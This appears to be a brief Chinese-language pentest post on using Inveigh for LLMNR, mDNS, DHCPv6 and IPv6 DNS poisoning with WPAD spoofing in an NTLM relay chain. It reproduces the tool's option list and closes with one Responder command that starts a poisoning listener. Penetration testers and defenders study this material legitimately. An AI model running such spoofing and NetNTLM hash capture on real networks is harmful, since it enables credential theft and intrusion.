Inveigh结合DNS v6配合NTLM Relay 攻击链的利用

Inveigh结合DNS v6配合NTLM Relay 的利用

通过Inveigh工具内网投毒，欺骗ipv6的DNS服务器，进行WPAD欺骗，结合NTLM Relay攻击链进行利用。

特点

惊该工具包含有以下协议的攻击： -LLMNR [packet sniffer | listener] -DNS [packet sniffer | listener] -mDNS [packet sniffer | listener] -NBNS [packet sniffer | listener] -DHCPv6 [packet sniffer | listener] -ICMPv6 [privileged raw socket] -HTTP [listener] -HTTPS [listener] -SMB [packet sniffer | listener] -LDAP [listener] -WebDAV [listener] -Proxy Auth [listener]

参数

Inveigh.exe -? Control: -Inspect Default=Disabled: (Y/N) inspect traffic only. -IPv4 Default=Enabled: (Y/N) IPv4 spoofing/capture. -IPv6 Default=Enabled: (Y/N) IPv6 spoofing/capture. -RunCount Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting. -RunTime Default=Unlimited: Run time duration in minutes. Output: -Console Default=3: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no informational, 3=all) -ConsoleLimit Default=Unlimited: Limit to queued console entries. -ConsoleStatus Default=Disabled: Interval in minutes for auto-displaying capture details. -ConsoleUnique Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture. -FileDirectory Default=Working Directory: Valid path to an output directory for enabled file output. -FileOutput Default=Disabled: (Y/N) real time file output. -FilePrefix Default=Inveigh: Prefix for all output files. -FileUnique Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes. -LogOutput Default=Disabled: (Y/N) outputting log entries. Spoofers: -DHCPV6 Default=Disabled: (Y/N) DHCPv6 spoofing. -DHCPv6TTL Default=300: Lease lifetime in seconds. -DNS Default=Enabled: (Y/N) DNS spoofing. -DNSHost Fully qualified hostname to use SOA/SRV responses. -DNSSRV Default=LDAP: Comma separated list of SRV request services to answer. -DNSSuffix DNS search suffix to include in DHCPv6/ICMPv6 responses. -DNSTTL Default=30: DNS TTL in seconds. -DNSTYPES Default=A: (A, SOA, SRV) Comma separated list of DNS types to spoof. -ICMPv6 Default=Enabled: (Y/N) sending ICMPv6 router advertisements. -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds. -IgnoreDomains Default=None: Comma separated list of domains to ignore when spoofing. -IgnoreHosts Default=None: Comma separated list of hostnames to ignore when spoofing. -IgnoreIPs Default=Local: Comma separated list of source IP addresses to ignore when spoofing. -IgnoreMACs Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing. -Local Default=Disabled: (Y/N) performing spoofing attacks against the host system. -LLMNR Default=Enabled: (Y/N) LLMNR spoofing. -LLMNRTTL Default=30: LLMNR TTL in seconds. -MAC Local MAC address for DHCPv6. -MDNS Default=Enabled: (Y/N) mDNS spoofing. -MDNSQuestions Default=QU,QM: Comma separated list of question types to spoof. (QU,QM) -MDNSTTL Default=120: mDNS TTL in seconds. -MDNSTypes Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY) -MDNSUnicast Default=Enabled: (Y/N) sending a unicast only response to a QM request. -NBNS Default=Disabled: (Y/N) NBNS spoofing. -NBNSTTL Default=165: NBNS TTL in seconds. -NBNSTypes Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B) -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing. -ReplyToHosts Default=All: Comma separated list of hostnames to respond to when spoofing. -ReplyToIPs Default=All: Comma separated list of source IP addresses to respond to when spoofing. -ReplyToMACs Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing. -SpooferIP Default=Autoassign: IP address included in spoofing responses. -SpooferIPv6 Default=Autoassign: IPv6 address included in spoofing responses. -Repeat Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture. Capture: -Cert Base64 certificate for TLS. -CertPassword Base64 certificate password for TLS. -Challenge Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners. -HTTP Default=Enabled: (Y/N) HTTP listener. -HTTPAuth Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication. -HTTPPorts Default=80: Comma seperated list of TCP ports for the HTTP listener. -HTTPRealm Default=ADFS: Basic authentication realm. -HTTPResponse Content to serve as the default HTTP/HTTPS/Proxy response. -HTTPS Default=Enabled: (Y/N) HTTPS listener. -HTTPSPorts Default=443: Comma separated list of TCP ports for the HTTPS listener. -IgnoreAgents Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad anmd proxy auth. -LDAP Default=Enabled: (Y/N) LDAP listener. -LDAPPorts Default=389: Comma separated list of TCP ports for the LDAP listener. -ListenerIP Default=Any: IP address for all listeners. -ListenerIPv6 Default=Any: IPv6 address for all listeners. -Machines Default=Disabled: (Y/N) machine account NetNTLM captures. -Proxy Default=Disabled: (Y/N) proxy listener authentication captures. -ProxyAuth Default=NTLM: (Basic/NTLM) Proxy authentication. -ProxyPort Default=8492: Port for the proxy listener. -SMB Default=Enabled: (Y/N) SMB sniffer/listener. -SMBPorts Default=445: Port for the SMB listener. -SnifferIP Default=Autoassign: IP address included in spoofing responses. -SnifferIPv6 Default=Autoassign: IPv6 address included in spoofing responses. -WebDAV Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener. -WebDAVAuth Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication. -WPADAuth Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM) -WPADResponse Default=Autogenerated: Contents of wpad.dat responses.

使用

在公网监听

responder -I eth0 -wrfvP